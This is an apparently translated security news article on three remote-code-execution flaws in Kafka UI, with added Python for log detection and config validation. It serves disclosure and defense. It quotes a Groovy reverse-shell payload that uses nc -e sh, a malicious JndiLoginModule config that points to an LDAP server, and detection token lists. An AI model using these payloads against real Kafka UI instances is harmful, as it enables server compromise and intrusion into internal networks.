Three ways to achieve remote code execution on the Kafka interface

Recent security research has revealed multiple vulnerabilities in the popular open-source Kafka UI application, used primarily by developers and administrators to manage and monitor Apache Kafka clusters. The tool, designed to give a visual representation of connected Kafka clusters, requires no authentication in its default configuration, which has left many Kafka UI instances unprotected, some of them exposed to the internet.

One of the most alarming findings is that these unprotected instances are a potential gateway into internal networks. Because they appear to expose only public or non-sensitive data, the threat they pose is easy to underestimate. Detailed research uncovered three vulnerabilities that allow remote code execution (RCE) in Kafka UI.

CVE-2023-52251: Arbitrary code execution via Groovy scripts

The first finding, CVE-2023-52251, concerns Kafka UI's message filtering functionality, which lets users run simple queries to filter messages on the server. Kafka UI also supports the GROOVY_SCRIPT filter type, which evaluates the query as a Groovy script and therefore lets an attacker execute arbitrary code. For example, an attacker could create a malicious filter with the content new ProcessBuilder("nc","host.docker.internal","1234","-e","sh").start(), obtaining a reverse shell on the affected server.
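Because any filter of type GROOVY_SCRIPT is code execution on the server, a defender can treat every such request as an event worth reviewing. The following Python is an added illustration of that check and is not code from the article or from the Kafka UI project: it parses access-log lines, picks out message-fetch requests, and flags those that use the Groovy filter type, with a simple risk tag for scripts that reach for process-spawning APIs. The log format, the request path shape and the parameter name filterQueryType are assumptions about how a kafka-ui deployment logs such requests; the log lines are constructed samples.

```python
"""Flag Kafka UI message-filter requests that use the GROOVY_SCRIPT filter type."""
import re
from urllib.parse import parse_qs, urlsplit

# Constructed sample access-log lines (not real traffic). Assumed format:
# client_ip method path status
SAMPLE_LOG = """\
10.0.0.5 GET /api/clusters/local/topics/orders/messages?filterQueryType=STRING_CONTAINS&q=order-42 200
203.0.113.7 GET /api/clusters/local/topics/orders/messages?filterQueryType=GROOVY_SCRIPT&q=new%20ProcessBuilder%28%22id%22%29.start%28%29 200
10.0.0.9 GET /api/clusters/local/topics 200
203.0.113.7 GET /api/clusters/local/topics/orders/messages?q=value.contains%28%22x%22%29&filterQueryType=groovy_script 200
"""

LOG_RE = re.compile(r"^(?P<ip>\S+) (?P<method>\S+) (?P<path>\S+) (?P<status>\d{3})$")
# Assumed shape of the message-fetch endpoint: /api/clusters/<cluster>/topics/<topic>/messages
MESSAGES_PATH_RE = re.compile(r"^/api/clusters/[^/]+/topics/[^/]+/messages$")
# Tokens that indicate the script tries to spawn a process or evaluate more code.
RISKY_TOKENS = ("ProcessBuilder", "Runtime", ".execute(", "Eval", "GroovyShell")


def parse_line(line):
    """Split one access-log line into its fields, or return None if it does not match."""
    m = LOG_RE.match(line.strip())
    return m.groupdict() if m else None


def classify_script(script):
    """Return 'high' when the Groovy text references process/eval APIs, else 'review'."""
    return "high" if any(tok in script for tok in RISKY_TOKENS) else "review"


def find_groovy_filters(log_text):
    """Return one finding per request that used a GROOVY_SCRIPT message filter."""
    findings = []
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        parts = urlsplit(rec["path"])
        if not MESSAGES_PATH_RE.match(parts.path):
            continue
        params = parse_qs(parts.query)  # parse_qs already percent-decodes values
        filter_type = params.get("filterQueryType", [""])[0].upper()
        if filter_type != "GROOVY_SCRIPT":
            continue
        segments = parts.path.split("/")
        script = params.get("q", [""])[0]
        findings.append({
            "client": rec["ip"],
            "cluster": segments[3],
            "topic": segments[5],
            "script": script,
            "risk": classify_script(script),
            "status": int(rec["status"]),
        })
    return findings


if __name__ == "__main__":
    for f in find_groovy_filters(SAMPLE_LOG):
        print(f"[{f['risk']}] {f['client']} -> {f['cluster']}/{f['topic']}: {f['script']}")
```

On a patched deployment the filter type should never appear in logs at all, so a single hit is a strong signal; on an unpatched one, every hit with a non-internal client address deserves an incident ticket.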

CVE-2024-32030: Code execution via JMX connector

Another vulnerability, CVE-2024-32030, affects the JMX connector. When Kafka UI is configured to allow dynamic reconfiguration through its API, an attacker can point Kafka UI at an arbitrary JMX server and carry out a deserialization attack, in the same way as the JNDI attacks exploited in the past. This lets the attacker run arbitrary commands on the Kafka UI server.

CVE-2023-25194: Code execution via JndiLoginModule

The third vulnerability, CVE-2023-25194, stems from a misconfiguration of sasl.jaas.config that allows a JndiLoginModule to be loaded. An attacker can use this to connect Kafka UI to a malicious JNDI server and carry out a deserialization attack that results in arbitrary code execution.

The vulnerabilities have been patched in Kafka UI version 0.7.2, released on April 10, 2024. All Kafka UI users should update to this version to mitigate these risks. The release fixes the vulnerabilities by updating the underlying libraries and restricting the loading of dangerous modules.
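The JMX and JndiLoginModule issues share a root cause: a cluster definition supplied at runtime is trusted to name any host and any login module. The following Python is an added example of the kind of validation a deployment can apply before accepting a dynamically submitted cluster definition; it is not code from the article or from the Kafka UI project. It allowlists the login module named in sasl.jaas.config (rejecting JndiLoginModule along with anything else not on the list) and allowlists the broker hosts the UI may connect to, which also bounds where the JMX connector can reach. The field names bootstrapServers, properties and metrics are assumptions modelled loosely on a per-cluster configuration; the allowed broker hosts and the two sample definitions are constructed.

```python
"""Validate a cluster definition before it is accepted through dynamic reconfiguration."""
import re
from urllib.parse import urlsplit

# Login modules a Kafka client legitimately needs (real Apache Kafka class names).
# Everything else, including com.sun.security.auth.module.JndiLoginModule, is rejected.
ALLOWED_LOGIN_MODULES = {
    "org.apache.kafka.common.security.plain.PlainLoginModule",
    "org.apache.kafka.common.security.scram.ScramLoginModule",
    "org.apache.kafka.common.security.oauthbearer.OAuthBearerLoginModule",
}

# Hosts the UI is permitted to reach; brokers and their JMX endpoints live here. Constructed.
ALLOWED_BROKER_HOSTS = {"kafka-1.internal", "kafka-2.internal", "kafka-3.internal"}

# A JAAS entry starts with the login module class followed by a control flag.
JAAS_RE = re.compile(
    r"^\s*(?P<module>[\w.$]+)\s+(?P<flag>required|requisite|sufficient|optional)\b",
    re.IGNORECASE,
)


def jaas_login_module(jaas_config):
    """Return the login module class named in a JAAS config string, or None if unparseable."""
    m = JAAS_RE.match(jaas_config)
    return m.group("module") if m else None


def validate_cluster(cluster):
    """Return the list of reasons the definition must be rejected; an empty list means OK."""
    problems = []

    jaas = cluster.get("properties", {}).get("sasl.jaas.config")
    if jaas is not None:
        module = jaas_login_module(jaas)
        if module is None:
            problems.append("sasl.jaas.config: unparseable login module entry")
        elif module not in ALLOWED_LOGIN_MODULES:
            problems.append(f"sasl.jaas.config: login module {module} is not allowed")

    for server in cluster.get("bootstrapServers", "").split(","):
        server = server.strip()
        if not server:
            continue
        host = urlsplit("//" + server).hostname  # split host from host:port
        if host not in ALLOWED_BROKER_HOSTS:
            problems.append(f"bootstrapServers: host {host!r} is not an approved broker")

    metrics = cluster.get("metrics")
    if metrics and str(metrics.get("type", "")).upper() == "JMX":
        port = metrics.get("port")
        if not isinstance(port, int) or not 1 <= port <= 65535:
            problems.append("metrics.port: JMX port must be an integer between 1 and 65535")

    return problems


# Constructed sample definitions: one acceptable, one that must be refused.
SAFE_CLUSTER = {
    "name": "prod",
    "bootstrapServers": "kafka-1.internal:9092,kafka-2.internal:9092",
    "properties": {
        "sasl.jaas.config": 'org.apache.kafka.common.security.scram.ScramLoginModule required '
                            'username="ui" password="[placeholder]";',
    },
    "metrics": {"type": "JMX", "port": 9997},
}

BAD_CLUSTER = {
    "name": "injected",
    "bootstrapServers": "203.0.113.7:9092",
    "properties": {
        "sasl.jaas.config": 'com.sun.security.auth.module.JndiLoginModule required '
                            'user.provider.url="ldap://203.0.113.7:1389/obj";',
    },
    "metrics": {"type": "JMX", "port": 9997},
}

if __name__ == "__main__":
    for c in (SAFE_CLUSTER, BAD_CLUSTER):
        print(c["name"], "->", validate_cluster(c) or "accepted")
```

This check belongs in front of the reconfiguration API, not only in the UI; as defense in depth, the Kafka client libraries themselves (since Apache Kafka 3.4.0) honour the JVM system property org.apache.kafka.disallowed.login.modules, which by default refuses to load JndiLoginModule regardless of what a configuration string asks for.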

The research highlights the need for robust security practices in modern administration tools like Kafka UI. Advanced features such as Groovy scripting and JMX connections must be tightly controlled to prevent abuse. Java and its surrounding technologies, while powerful, can be exploited if not handled carefully.

These findings serve as a reminder of persistent risks and the need to stay up-to-date with the latest security practices and patches.

Source: MiMub (in Spanish)